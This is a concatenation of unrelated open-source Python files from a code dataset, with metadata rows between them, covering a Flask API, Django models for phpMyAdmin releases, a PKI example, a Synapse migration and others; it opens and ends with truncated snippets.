ax = plt.figure(figsize=(16,10)).gca(projection='3d')
ax.scatter(
xs=train.loc[rndperm,:]["pca_one"],
ys=train.loc[rndperm,:]["pca_two"],
zs=train.loc[rndperm,:]["pca_three"],
c=train.loc[rndperm,:]["2041"],
cmap='tab10'
)
ax.set_xlabel('pca_one')
ax.set_ylabel('pca_two')
ax.set_zlabel('pca_three')
plt.savefig("PCA_3d.png")
| 31.496732
| 97
| 0.775265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,100
| 0.228263
|
b16413494678ee579844f16a2bea9f231ef05803
| 1,601
|
py
|
Python
|
API/application.py
|
XuhuaHuang/LearnPython
|
eb39f11147716193971dd5a8894e675daa1b9d01
|
[
"MIT"
] | null | null | null |
API/application.py
|
XuhuaHuang/LearnPython
|
eb39f11147716193971dd5a8894e675daa1b9d01
|
[
"MIT"
] | null | null | null |
API/application.py
|
XuhuaHuang/LearnPython
|
eb39f11147716193971dd5a8894e675daa1b9d01
|
[
"MIT"
] | null | null | null |
from flask import Flask, jsonify, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'
db = SQLAlchemy(app)
class Drink(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
description = db.Column(db.String(120))
def __repr__(self):
return "{} - {}".format(self.name, self.description)
@app.route('/')
def index():
return "Greetings"
@app.route('/drinks')
def get_drinks():
drinks = Drink.query.all() # retrieve all drinks in the database
    output = []  # create an empty list to serve as a placeholder for the JSON object
for drink in drinks:
drink_data = {'name': drink.name, 'description': drink.description}
output.append(drink_data)
return {"drinks": output}
@app.route('/drinks/<id>')
def get_drink(id: int):
drink = Drink.query.get_or_404(id)
return jsonify({'name': drink.name, 'description': drink.description})
@app.route('/drinks', methods=['POST'])
def add_drink():
drink = Drink(name=request.json['name'], description=request.json['description'])
db.session.add(drink)
db.session.commit()
return {'id': drink.id} # return new id for posted drink
@app.route('/drinks/<id>', methods=['DELETE'])
def delete_drink(id):
    drink = Drink.query.get(id)
if drink is None:
return {'Error': 'Drink not found to delete'}
else:
db.session.delete(drink)
db.session.commit()
return {'Confirmation': 'Successfully deleted drink'}
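# Usage sketch (illustrative, not part of the original file): exercise the API
# with Flask's built-in test client (the json= keyword needs Werkzeug >= 0.15);
# the drink below is a made-up example.
if __name__ == '__main__':
    db.create_all()  # create the data.db tables before first use
    with app.test_client() as client:
        client.post('/drinks', json={'name': 'Cola', 'description': 'Fizzy'})
        print(client.get('/drinks').get_json())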
| 28.589286
| 85
| 0.66396
| 266
| 0.166146
| 0
| 0
| 1,131
| 0.706433
| 0
| 0
| 406
| 0.253592
|
b165edb3b3722f2964b765aab8fe578c7cc4aee1
| 2,199
|
py
|
Python
|
examples/mass-generation.py
|
Orange-OpenSource/tinypyki
|
10c57fb3a4413f4c601baaf58e53d92fd4a09f49
|
[
"BSD-3-Clause"
] | 1
|
2018-05-29T22:50:33.000Z
|
2018-05-29T22:50:33.000Z
|
examples/mass-generation.py
|
Orange-OpenSource/tinypyki
|
10c57fb3a4413f4c601baaf58e53d92fd4a09f49
|
[
"BSD-3-Clause"
] | null | null | null |
examples/mass-generation.py
|
Orange-OpenSource/tinypyki
|
10c57fb3a4413f4c601baaf58e53d92fd4a09f49
|
[
"BSD-3-Clause"
] | 2
|
2016-11-01T11:45:28.000Z
|
2021-06-22T10:18:46.000Z
|
#!/usr/bin/env python
"""A third example to get started with tinypyki.
Toying with mass certificate generation.
"""
import os
import tinypyki as tiny
print("Creating a pki instance named \"mass-pki\"")
pki = tiny.PKI("mass-pki")
print("Create the \"root-ca\"")
root_ca = tiny.Node(nid = "root-ca", pathlen = 1, san="email=dev.null@hexample.com")
print("Create 10 sub nodes")
targets = [tiny.Node(nid = "target-{0}".format(i), issuer = "root-ca", ntype="u", san="ip=192.168.0.{0}, dns=hexample.com".format((175+i)%256)) for i in range(10)]
print("Insert the root-ca then all nodes in the pki")
tiny.do.insert(root_ca, pki)
for node in targets:
tiny.change.subj(node, cn=node.nid + "-dummy-hexample")
tiny.do.insert(node, pki)
print("Create everything, including p12 bundles")
tiny.do.everything(pki, pkcs12 = True)
print("Observe the pki changes")
tiny.show(pki)
# Uncomment this if you wish to see the contents of all the files
# print("Showing the contents of all files")
# for node in pki.nodes.values():
# tiny.show(node.key_path)
# tiny.show(node.csr_path)
# tiny.show(node.cert_path)
# tiny.show(node.crl_path)
print("Revoking every other certificate")
for node in pki.nodes.values():
if node.nid.startswith("target"):
if not int(node.nid.split("-")[-1])%2:
# Valid reasons: "unspecified", "keycompromise", "cacompromise", "affiliationchanged", "superseded", "cessationofoperation", "certificatehold", "removefromcrl"
tiny.do.revoke(node, reason="keycompromise")
print("Observe the crl changes of the root-ca")
tiny.show(pki.nodes["root-ca"].crl_path)
print("Create the verification environment")
tiny.do.verifyenv(pki, create=True)
print("Verify every file related to root-ca")
tiny.do.verify(pki.nodes["root-ca"])
# You can verify specific elements, by specifying "key", "csr", "cert", "crl" or "pkcs12"
# tiny.do.verify(pki.nodes["root-ca"], "key")
# You can verify the whole pki as follows
# tiny.do.verify_all(pki)
print("Destroy the verification environment")
tiny.do.verifyenv(pki, create=False)
# Uncomment this if you wish to delete the files
# print("Cleaning up the work direcotry")
# tiny.do.clean(pki)
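# Illustrative follow-up (commented out) using only calls demonstrated above:
# re-create the verification environment and verify a single leaf certificate.
# tiny.do.verifyenv(pki, create=True)
# tiny.do.verify(pki.nodes["target-1"], "cert")
# tiny.do.verifyenv(pki, create=False)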
| 32.820896
| 171
| 0.703502
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,404
| 0.638472
|
b1667d176dd7399e7e7f6c6217ae79f8d38f3cee
| 638
|
py
|
Python
|
passive_capture/reporter/admin.py
|
Sillson/passive_capture_py
|
167d08865400571c9eed60c0040cf67d27fa11b4
|
[
"MIT"
] | null | null | null |
passive_capture/reporter/admin.py
|
Sillson/passive_capture_py
|
167d08865400571c9eed60c0040cf67d27fa11b4
|
[
"MIT"
] | null | null | null |
passive_capture/reporter/admin.py
|
Sillson/passive_capture_py
|
167d08865400571c9eed60c0040cf67d27fa11b4
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.gis import admin as geo_model_admin
from leaflet.admin import LeafletGeoAdmin
from .models import Forecasts, Dam, Species
# Forecast Model
class ForecastsAdmin(admin.ModelAdmin):
list_display = ('dam', 'species', 'forecast_range')
admin.site.register(Forecasts, ForecastsAdmin)
# Species Model
class SpeciesAdmin(admin.ModelAdmin):
list_display = ('name', 'reference_name')
admin.site.register(Species, SpeciesAdmin)
# Dam Model - requires GeoAdmin privileges
class DamAdmin(LeafletGeoAdmin):
list_display = ('name', 'abbr', 'location')
admin.site.register(Dam, DamAdmin)
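# Equivalent registration style (illustrative): Django also supports registering
# ModelAdmin classes with a decorator instead of admin.site.register, e.g.
# @admin.register(Species)
# class SpeciesAdmin(admin.ModelAdmin):
#     list_display = ('name', 'reference_name')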
| 26.583333
| 55
| 0.782132
| 252
| 0.394984
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.230408
|
b166dad82fde9d6a3518b1f26a85b2e2546d77b9
| 16,633
|
py
|
Python
|
files/models.py
|
AdrianoCahete/website
|
114156e24b37e5f2293aeac3c29ab4d5cd8311cd
|
[
"MIT"
] | null | null | null |
files/models.py
|
AdrianoCahete/website
|
114156e24b37e5f2293aeac3c29ab4d5cd8311cd
|
[
"MIT"
] | null | null | null |
files/models.py
|
AdrianoCahete/website
|
114156e24b37e5f2293aeac3c29ab4d5cd8311cd
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
# vim: set expandtab sw=4 ts=4 sts=4:
#
# phpMyAdmin web site
#
# Copyright (C) 2008 - 2016 Michal Cihar <michal@cihar.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import json
import urllib2
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.core.urlresolvers import reverse
from django.db import models
from django.conf import settings
from django.utils import timezone
import os.path
from data.themes import CSSMAP
from markupfield.fields import MarkupField
from pmaweb.cdn import purge_cdn, purge_all_cdn
# Naming of versions
VERSION_INFO = (
('alpha1', ' First alpha version.'),
('alpha2', ' Second alpha version.'),
('alpha3', ' Third alpha version.'),
('alpha4', ' Fourth alpha version.'),
('beta1', ' First beta version.'),
('beta2', ' Second beta version.'),
('beta3', ' Third beta version.'),
('beta4', ' Fourth beta version.'),
('beta', ' Beta version.'),
('rc1', ' First release candidate.'),
('rc2', ' Second release candidate.'),
('rc3', ' Third release candidate.'),
('rc4', ' Fourth release candidate.'),
('rc', ' Release candidate.'),
)
DOCKER_TRIGGER = \
'https://registry.hub.docker.com/u/phpmyadmin/phpmyadmin/trigger/{0}/'
def get_current_releases():
delta = 1000000
result = []
for version in settings.LISTED_BRANCHES:
min_vernum = Release.parse_version(version)
max_vernum = min_vernum + delta
stable_releases = Release.objects.filter(
version_num__gte=min_vernum,
version_num__lt=max_vernum,
stable=True,
)
if stable_releases.exists():
result.append(stable_releases[0])
return result
class Release(models.Model):
version = models.CharField(max_length=50, unique=True)
version_num = models.IntegerField(default=0, unique=True)
release_notes = MarkupField(default_markup_type='markdown')
stable = models.BooleanField(default=False, db_index=True)
snapshot = models.BooleanField(default=False, db_index=True)
date = models.DateTimeField(db_index=True, default=timezone.now)
purged = False
class Meta(object):
ordering = ['-version_num']
def __unicode__(self):
return self.version
def get_absolute_url(self):
if self.snapshot:
return reverse('downloads')
return reverse('release', kwargs={'version': self.version})
def simpledownload(self):
try:
return self.download_set.get(
filename__endswith='-all-languages.zip'
)
except Download.DoesNotExist:
try:
return self.download_set.all()[0]
except IndexError:
return None
@staticmethod
def parse_version(version):
if '+' in version:
# Snapshots, eg. 4.7+snapshot
parts = [int(x) for x in version.split('+')[0].split('.')]
assert len(parts) == 2
return (
100000000 * parts[0] +
1000000 * parts[1]
)
if '-' in version:
version, suffix = version.split('-')
if suffix.startswith('alpha'):
suffix_num = int(suffix[5:])
elif suffix.startswith('beta'):
suffix_num = 10 + int(suffix[4:])
elif suffix.startswith('rc'):
suffix_num = 50 + int(suffix[2:])
else:
raise ValueError(version)
        else:
            suffix_num = 99
parts = [int(x) for x in version.split('.')]
if len(parts) == 2:
parts.append(0)
if len(parts) == 3:
parts.append(0)
assert len(parts) == 4
return (
100000000 * parts[0] +
1000000 * parts[1] +
10000 * parts[2] +
100 * parts[3] +
suffix_num
)
def save(self, *args, **kwargs):
self.version_num = self.parse_version(self.version)
self.stable = self.version_num % 100 == 99
super(Release, self).save(*args, **kwargs)
def get_version_suffix(self):
'''
Returns suffix for a version.
'''
for match, result in VERSION_INFO:
if self.version.find(match) != -1:
return result
return ''
def get_php_versions(self):
if self.version[:3] == '5.1':
return '>=7.1,<8.0'
elif self.version[:3] == '5.0':
return '>=7.1,<8.0'
elif self.version[:3] == '4.9':
return '>=5.5,<8.0'
elif self.version[:3] == '4.8':
return '>=5.5,<7.3'
elif self.version[:3] == '4.7':
return '>=5.5,<7.3'
elif self.version[:3] == '4.6':
return '>=5.5,<7.2'
elif self.version[:3] == '4.5':
return '>=5.5,<7.1'
elif self.version[:3] == '4.4':
return '>=5.3,<7.1'
elif self.version[:3] == '4.3':
return '>=5.3,<7.0'
elif self.version[:3] == '4.2':
return '>=5.3,<7.0'
elif self.version[:3] == '4.1':
return '>=5.3,<7.0'
elif self.version[:3] == '4.0':
return '>=5.2,<5.3'
def get_mysql_versions(self):
if self.version[:3] == '5.1':
return '>=5.5'
elif self.version[:3] == '5.0':
return '>=5.5'
elif self.version[:3] == '4.9':
return '>=5.5'
elif self.version[:3] == '4.8':
return '>=5.5'
elif self.version[:3] == '4.7':
return '>=5.5'
elif self.version[:3] == '4.6':
return '>=5.5'
elif self.version[:3] == '4.5':
return '>=5.5'
elif self.version[:3] == '4.4':
return '>=5.5'
elif self.version[:3] == '4.3':
return '>=5.5'
elif self.version[:3] == '4.2':
return '>=5.5'
elif self.version[:3] == '4.1':
return '>=5.5'
elif self.version[:3] == '4.0':
return '>=5.0'
def get_version_info(self):
'''
Returns description to the phpMyAdmin version.
'''
text = ''
if self.version[:2] == '0.':
text = 'Historical release.'
elif self.version[:2] == '1.':
text = 'Historical release.'
elif self.version[:2] == '2.':
text = 'Version compatible with PHP 4+ and MySQL 3+.'
elif self.version[:2] == '3.':
text = (
'Frames version not requiring Javascript. ' +
'Requires PHP 5.2 and MySQL 5. ' +
'Supported for security fixes only, until Jan 1, 2014.'
)
elif self.version[:3] == '5.1':
text = (
'Future version compatible with PHP 7.1 and newer and MySQL 5.5 and newer. '
)
elif self.version[:3] == '5.0':
text = (
'Current version compatible with PHP 7.1 and newer and MySQL 5.5 and newer. '
)
elif self.version[:3] == '4.9':
text = (
'Older version compatible with PHP 5.5 to 7.4 and MySQL 5.5 and newer. ' +
'Currently supported for security fixes only. '
)
elif self.version[:3] == '4.8':
text = (
'Older version compatible with PHP 5.5 to 7.2 and MySQL 5.5 and newer. ' +
'Was supported until June 4, 2019.'
)
elif self.version in ('4.7.0', '4.7.1', '4.7.2', '4.7.3', '4.7.0-rc1', '4.7.0-beta1'):
text = (
'Older version compatible with PHP 5.5 to 7.1 and MySQL 5.5 and newer. ' +
'Was supported until April 7, 2018.'
)
elif self.version[:3] == '4.7':
text = (
'Older version compatible with PHP 5.5 to 7.2 and MySQL 5.5 and newer. ' +
'Was supported until April 7, 2018.'
)
elif self.version[:3] == '4.6':
text = (
'Older version compatible with PHP 5.5 to 7.1 and MySQL 5.5 and newer. ' +
'Was supported until April 1, 2017.'
)
elif self.version[:3] == '4.5':
text = (
'Older version compatible with PHP 5.5 to 7.0 and MySQL 5.5. ' +
'Was supported until April 1, 2016.'
)
elif self.version[:3] == '4.4':
text = (
'Older version compatible with PHP 5.3.7 to 7.0 and MySQL 5.5. ' +
'Was supported until October 1, 2016.'
)
elif self.version[:3] == '4.3':
text = (
'Older version compatible with PHP 5.3 and MySQL 5.5. ' +
'Was supported until October 1, 2015.'
)
elif self.version[:3] == '4.2':
text = (
'Older version compatible with PHP 5.3 and MySQL 5.5. ' +
'Was supported until July 1, 2015.'
)
elif self.version[:3] == '4.1':
text = (
'Older version compatible with PHP 5.3 and MySQL 5.5. ' +
'Was supported until January 1, 2015.'
)
elif self.version[:3] == '4.0':
text = (
'Older version compatible with PHP 5.2 and MySQL 5. ' +
'Does not support PHP 5.5 or newer. ' +
'Was supported until April 1, 2017.'
)
text += self.get_version_suffix()
return text
def get_downloads(self):
"""Lists downloads, making all-languages.zip first"""
dlset = self.download_set
return (
list(dlset.filter(filename__endswith='all-languages.zip')) +
list(dlset.exclude(filename__endswith='all-languages.zip'))
)
class Download(models.Model):
release = models.ForeignKey(Release)
filename = models.CharField(max_length=50)
size = models.IntegerField(default=0)
sha1 = models.CharField(max_length=40)
sha256 = models.CharField(max_length=64)
signed = models.BooleanField(default=False)
class Meta(object):
ordering = ['-release__version_num', 'filename']
unique_together = ['release', 'filename']
def __unicode__(self):
if self.release.snapshot:
return '/snapshots/{0}'.format(
self.filename
)
return '/phpMyAdmin/{0}/{1}'.format(
self.release.version,
self.filename
)
@property
def size_k(self):
return self.size / 1024
@property
def size_m(self):
return self.size / (1024 * 1024)
def get_filesystem_path(self):
return os.path.join(
settings.FILES_PATH,
'phpMyAdmin',
self.release.version,
self.filename
)
def get_absolute_url(self):
return 'https://files.phpmyadmin.net{0}'.format(
self.__unicode__()
)
def get_signed_url(self):
if not self.signed:
return ''
return 'https://files.phpmyadmin.net{0}.asc'.format(
self.__unicode__()
)
def get_checksum_url(self):
return 'https://files.phpmyadmin.net{0}.sha256'.format(
self.__unicode__()
)
def get_alternate_url(self):
return 'https://1126968067.rsc.cdn77.org{0}'.format(
self.__unicode__()
)
@property
def archive(self):
return self.filename.rsplit('.', 1)[-1]
@property
def composer_type(self):
ext = self.filename.rsplit('.', 1)[-1]
if ext == 'zip':
return 'zip'
else:
return 'tar'
@property
def get_stable_url(self):
filename, ext = self.filename.rsplit('.', 1)
if ext not in ('zip', '7z'):
filename, ext2 = filename.rsplit('.', 1)
ext = '{0}.{1}'.format(ext2, ext)
variant = filename.split('-', 2)[2]
return reverse(
'latest-download',
kwargs={
'flavor': variant,
'extension': '.' + ext,
}
)
@property
def get_stable_filename(self):
return self.get_stable_url.rsplit('/', 1)[1]
@property
def is_featured(self):
return self.filename.endswith('all-languages.zip')
class Theme(models.Model):
name = models.CharField(max_length=50)
display_name = models.CharField(max_length=50)
version = models.CharField(max_length=50)
filename = models.CharField(max_length=100, unique=True)
supported_versions = models.CharField(max_length=50)
description = models.TextField()
author = models.CharField(max_length=200)
url = models.URLField(blank=True)
size = models.IntegerField(default=0)
sha1 = models.CharField(max_length=40)
sha256 = models.CharField(max_length=64)
signed = models.BooleanField(default=False)
date = models.DateTimeField(db_index=True, default=timezone.now)
show = models.BooleanField(default=True)
class Meta(object):
ordering = ['name', 'version']
def __unicode__(self):
return u'{0} {1}'.format(self.display_name, self.version)
@property
def imgname(self):
return 'images/themes/{0}.png'.format(self.name)
def get_absolute_url(self):
return 'https://files.phpmyadmin.net/themes/{0}/{1}/{2}'.format(
self.name,
self.version,
self.filename,
)
def get_signed_url(self):
if not self.signed:
return ''
return 'https://files.phpmyadmin.net/themes/{0}/{1}/{2}.asc'.format(
self.name,
self.version,
self.filename,
)
def get_filesystem_path(self):
return os.path.join(
settings.FILES_PATH,
'themes',
self.name,
self.version,
self.filename
)
@property
def get_css(self):
return CSSMAP[self.supported_versions]
def dockerhub_trigger(tag):
if settings.DOCKERHUB_TOKEN is None:
return
request = urllib2.Request(
DOCKER_TRIGGER.format(settings.DOCKERHUB_TOKEN),
json.dumps({'docker_tag': tag}),
{'Content-Type': 'application/json'}
)
handle = urllib2.urlopen(request)
handle.read()
@receiver(post_save, sender=Release)
def purge_release(sender, instance, **kwargs):
if instance.purged:
return
instance.purged = True
purge_cdn(
# Pages with _littleboxes.html
reverse('home'),
reverse('news'),
# Download lists
reverse('files'),
reverse('feed-files'),
reverse('downloads'),
# Version dumps
'/downloads/list.txt',
'/home_page/version.txt',
'/home_page/version.js',
'/home_page/version.json',
'/downloads/phpMyAdmin-latest-all-languages.tar.bz2',
'/downloads/phpMyAdmin-latest-all-languages.tar.gz',
'/downloads/phpMyAdmin-latest-all-languages.tar.xz',
'/downloads/phpMyAdmin-latest-all-languages.zip',
'/downloads/phpMyAdmin-latest-english.tar.bz2',
'/downloads/phpMyAdmin-latest-english.tar.gz',
'/downloads/phpMyAdmin-latest-english.tar.xz',
'/downloads/phpMyAdmin-latest-english.zip',
'/downloads/phpMyAdmin-latest-source.tar.xz',
reverse('doap'),
reverse('pad'),
# This release
instance.get_absolute_url(),
)
# Purge all pages as every page contains download link
purge_all_cdn()
@receiver(post_save, sender=Download)
def purge_download(sender, instance, **kwargs):
purge_release(sender, instance.release)
@receiver(post_save, sender=Theme)
def purge_theme(sender, instance, **kwargs):
purge_cdn(reverse('themes'))
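# Worked examples for Release.parse_version (values follow directly from the
# arithmetic in the method; shown for illustration only):
#   parse_version("4.7.0")        -> 4*10**8 + 7*10**6 + 99 = 407000099
#   parse_version("4.7.0-rc1")    -> 4*10**8 + 7*10**6 + 51 = 407000051
#   parse_version("4.7+snapshot") -> 4*10**8 + 7*10**6      = 407000000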
| 32.486328
| 94
| 0.554199
| 12,409
| 0.746047
| 0
| 0
| 3,852
| 0.231588
| 0
| 0
| 4,969
| 0.298743
|
b166eaf0f74796997babad39184ea07ba1f3c842
| 948
|
py
|
Python
|
main/models/sign.py
|
fakegit/gxgk-wechat-server
|
89ad21bcd2dcd1c28e43d4b230d47207e78098b3
|
[
"MIT"
] | 1,564
|
2015-09-01T13:11:02.000Z
|
2022-03-29T08:44:56.000Z
|
main/models/sign.py
|
fakegit/gxgk-wechat-server
|
89ad21bcd2dcd1c28e43d4b230d47207e78098b3
|
[
"MIT"
] | 11
|
2015-12-13T05:04:15.000Z
|
2019-09-10T06:14:03.000Z
|
main/models/sign.py
|
fakegit/gxgk-wechat-server
|
89ad21bcd2dcd1c28e43d4b230d47207e78098b3
|
[
"MIT"
] | 649
|
2015-12-11T09:23:09.000Z
|
2022-03-04T17:31:28.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from . import db
class Sign(db.Model):
__table_args__ = {
'mysql_engine': 'InnoDB',
'mysql_charset': 'utf8mb4'
}
openid = db.Column(db.String(32), primary_key=True, unique=True,
nullable=False)
lastsigntime = db.Column(db.BigInteger, default=0, nullable=False)
totaldays = db.Column(db.SmallInteger, default=0, nullable=False)
keepdays = db.Column(db.SmallInteger, default=0, nullable=False)
def __init__(self, openid, lastsigntime, totaldays, keepdays):
self.openid = openid
self.lastsigntime = lastsigntime
self.totaldays = totaldays
self.keepdays = keepdays
def __repr__(self):
return '<openid %r>' % self.openid
def save(self):
db.session.add(self)
db.session.commit()
return self
def update(self):
db.session.commit()
return self
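# Usage sketch (illustrative; assumes the Flask-SQLAlchemy `db` above is bound
# to an application):
# sign = Sign(openid='sample_openid', lastsigntime=0, totaldays=0, keepdays=0)
# sign.save()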
| 26.333333
| 70
| 0.619198
| 881
| 0.929325
| 0
| 0
| 0
| 0
| 0
| 0
| 103
| 0.10865
|
b167bd125d417e4efdcc02611c67219208d449ac
| 2,579
|
py
|
Python
|
pinax/projects/sample_group_project/urls.py
|
peiwei/pinax
|
34f95b1df4318655fe9bd90dcda8fe824e0c4117
|
[
"MIT"
] | 1
|
2019-02-12T04:45:09.000Z
|
2019-02-12T04:45:09.000Z
|
pinax/projects/sample_group_project/urls.py
|
peiwei/pinax
|
34f95b1df4318655fe9bd90dcda8fe824e0c4117
|
[
"MIT"
] | null | null | null |
pinax/projects/sample_group_project/urls.py
|
peiwei/pinax
|
34f95b1df4318655fe9bd90dcda8fe824e0c4117
|
[
"MIT"
] | 1
|
2019-02-12T04:45:40.000Z
|
2019-02-12T04:45:40.000Z
|
from django.conf import settings
from django.conf.urls.defaults import *
from django.views.generic.simple import direct_to_template
from django.contrib import admin
admin.autodiscover()
from account.openid_consumer import PinaxConsumer
handler500 = "pinax.views.server_error"
if settings.ACCOUNT_OPEN_SIGNUP:
signup_view = "account.views.signup"
else:
signup_view = "signup_codes.views.signup"
urlpatterns = patterns("",
url(r"^$", direct_to_template, {
"template": "homepage.html",
}, name="home"),
url(r"^admin/invite_user/$", "signup_codes.views.admin_invite_user", name="admin_invite_user"),
url(r"^account/signup/$", signup_view, name="acct_signup"),
(r"^about/", include("about.urls")),
(r"^account/", include("account.urls")),
(r"^openid/(.*)", PinaxConsumer()),
(r"^profiles/", include("basic_profiles.urls")),
(r"^notices/", include("notification.urls")),
(r"^announcements/", include("announcements.urls")),
(r"^tagging_utils/", include("tagging_utils.urls")),
(r"^comments/", include("threadedcomments.urls")),
(r"^attachments/", include("attachments.urls")),
(r"^groups/", include("basic_groups.urls")),
(r"^tribes/", include("tribes.urls")),
(r"^projects/", include("projects.urls")),
(r"^flag/", include("flag.urls")),
(r"^admin/", include(admin.site.urls)),
)
from tagging.models import TaggedItem
from projects.models import Project
from tasks.models import Task
from topics.models import Topic
from wiki.models import Article as WikiArticle
tagged_models = (
dict(title="Projects",
query=lambda tag: TaggedItem.objects.get_by_model(Project, tag),
),
dict(title="Topics",
query=lambda tag: TaggedItem.objects.get_by_model(Topic, tag),
),
dict(title="Project Tasks",
query=lambda tag: TaggedItem.objects.get_by_model(Task, tag),
),
dict(title="Wiki Articles",
query=lambda tag: TaggedItem.objects.get_by_model(WikiArticle, tag),
),
)
tagging_ext_kwargs = {
'tagged_models':tagged_models,
}
urlpatterns += patterns('',
url(r'^tags/(?P<tag>.+)/(?P<model>.+)$', 'tagging_ext.views.tag_by_model',
kwargs=tagging_ext_kwargs, name='tagging_ext_tag_by_model'),
url(r'^tags/(?P<tag>.+)/$', 'tagging_ext.views.tag',
kwargs=tagging_ext_kwargs, name='tagging_ext_tag'),
url(r'^tags/$', 'tagging_ext.views.index', name='tagging_ext_index'),
)
if settings.SERVE_MEDIA:
urlpatterns += patterns("",
(r"", include("staticfiles.urls")),
)
| 29.306818
| 99
| 0.669252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 909
| 0.352462
|
b1684a8441dca67ce07724eebd55d0e4be2809be
| 3,060
|
py
|
Python
|
synapse/storage/schema/delta/50/make_event_content_nullable.py
|
Cadair/synapse
|
466866a1d9dd1fcf82348a36c0532cb0c6614767
|
[
"Apache-2.0"
] | 2
|
2020-04-30T18:38:02.000Z
|
2020-07-08T21:38:28.000Z
|
synapse/storage/schema/delta/50/make_event_content_nullable.py
|
Cadair/synapse
|
466866a1d9dd1fcf82348a36c0532cb0c6614767
|
[
"Apache-2.0"
] | 4
|
2020-03-04T23:47:05.000Z
|
2021-12-09T21:41:44.000Z
|
synapse/storage/schema/delta/50/make_event_content_nullable.py
|
Cadair/synapse
|
466866a1d9dd1fcf82348a36c0532cb0c6614767
|
[
"Apache-2.0"
] | 2
|
2020-03-03T18:34:52.000Z
|
2022-03-31T11:06:18.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
We want to stop populating 'event.content', so we need to make it nullable.
If this has to be rolled back, then the following should populate the missing data:
Postgres:
UPDATE events SET content=(ej.json::json)->'content' FROM event_json ej
WHERE ej.event_id = events.event_id AND
stream_ordering < (
SELECT stream_ordering FROM events WHERE content IS NOT NULL
ORDER BY stream_ordering LIMIT 1
);
UPDATE events SET content=(ej.json::json)->'content' FROM event_json ej
WHERE ej.event_id = events.event_id AND
stream_ordering > (
SELECT stream_ordering FROM events WHERE content IS NOT NULL
ORDER BY stream_ordering DESC LIMIT 1
);
SQLite:
UPDATE events SET content=(
SELECT json_extract(json,'$.content') FROM event_json ej
WHERE ej.event_id = events.event_id
)
WHERE
stream_ordering < (
SELECT stream_ordering FROM events WHERE content IS NOT NULL
ORDER BY stream_ordering LIMIT 1
)
OR stream_ordering > (
SELECT stream_ordering FROM events WHERE content IS NOT NULL
ORDER BY stream_ordering DESC LIMIT 1
);
"""
import logging
from synapse.storage.engines import PostgresEngine
logger = logging.getLogger(__name__)
def run_create(cur, database_engine, *args, **kwargs):
pass
def run_upgrade(cur, database_engine, *args, **kwargs):
if isinstance(database_engine, PostgresEngine):
cur.execute(
"""
ALTER TABLE events ALTER COLUMN content DROP NOT NULL;
"""
)
return
# sqlite is an arse about this. ref: https://www.sqlite.org/lang_altertable.html
cur.execute(
"SELECT sql FROM sqlite_master WHERE tbl_name='events' AND type='table'"
)
(oldsql,) = cur.fetchone()
sql = oldsql.replace("content TEXT NOT NULL", "content TEXT")
if sql == oldsql:
raise Exception("Couldn't find null constraint to drop in %s" % oldsql)
logger.info("Replacing definition of 'events' with: %s", sql)
cur.execute("PRAGMA schema_version")
(oldver,) = cur.fetchone()
cur.execute("PRAGMA writable_schema=ON")
cur.execute(
"UPDATE sqlite_master SET sql=? WHERE tbl_name='events' AND type='table'",
(sql,),
)
cur.execute("PRAGMA schema_version=%i" % (oldver + 1,))
cur.execute("PRAGMA writable_schema=OFF")
| 31.546392
| 84
| 0.671242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,353
| 0.768954
|
b169661dd2e123c3c4e9fd3e7fd531b5b79cc52c
| 1,822
|
py
|
Python
|
tools/applause_detection/applause_detection.py
|
AudiovisualMetadataPlatform/amp_mgms
|
593d4f4d40b597a7753cd152cd233976e6b28c75
|
[
"Apache-2.0"
] | null | null | null |
tools/applause_detection/applause_detection.py
|
AudiovisualMetadataPlatform/amp_mgms
|
593d4f4d40b597a7753cd152cd233976e6b28c75
|
[
"Apache-2.0"
] | 1
|
2022-02-16T16:21:03.000Z
|
2022-02-16T16:21:03.000Z
|
tools/applause_detection/applause_detection.py
|
AudiovisualMetadataPlatform/amp_mgms
|
593d4f4d40b597a7753cd152cd233976e6b28c75
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import os
import os.path
import shutil
import subprocess
import sys
import tempfile
import argparse
import amp.utils
def main():
#(root_dir, input_audio, min_segment_duration, amp_segments) = sys.argv[1:5]
parser = argparse.ArgumentParser()
parser.add_argument("input_audio")
parser.add_argument("min_segment_duration")
parser.add_argument("amp_segments")
args = parser.parse_args()
(input_audio, min_segment_duration, amp_segments) = (args.input_audio, args.min_segment_duration, args.amp_segments)
print("Current directory: " + os.getcwd())
print("Input audio: " + input_audio)
    # use a tmp directory accessible to the Singularity container for input/output
with tempfile.TemporaryDirectory(dir = "/tmp") as tmpdir:
# copy the input audio file to the tmp directory
filename = os.path.basename(input_audio)
shutil.copy(input_audio, f"{tmpdir}/{filename}")
print("Temporary directory " + tmpdir + " after input file copied: " + str(os.listdir(tmpdir)))
# The applause_detection singularity file is assumed to be @ {mgm_sif}/applause_detection.sif
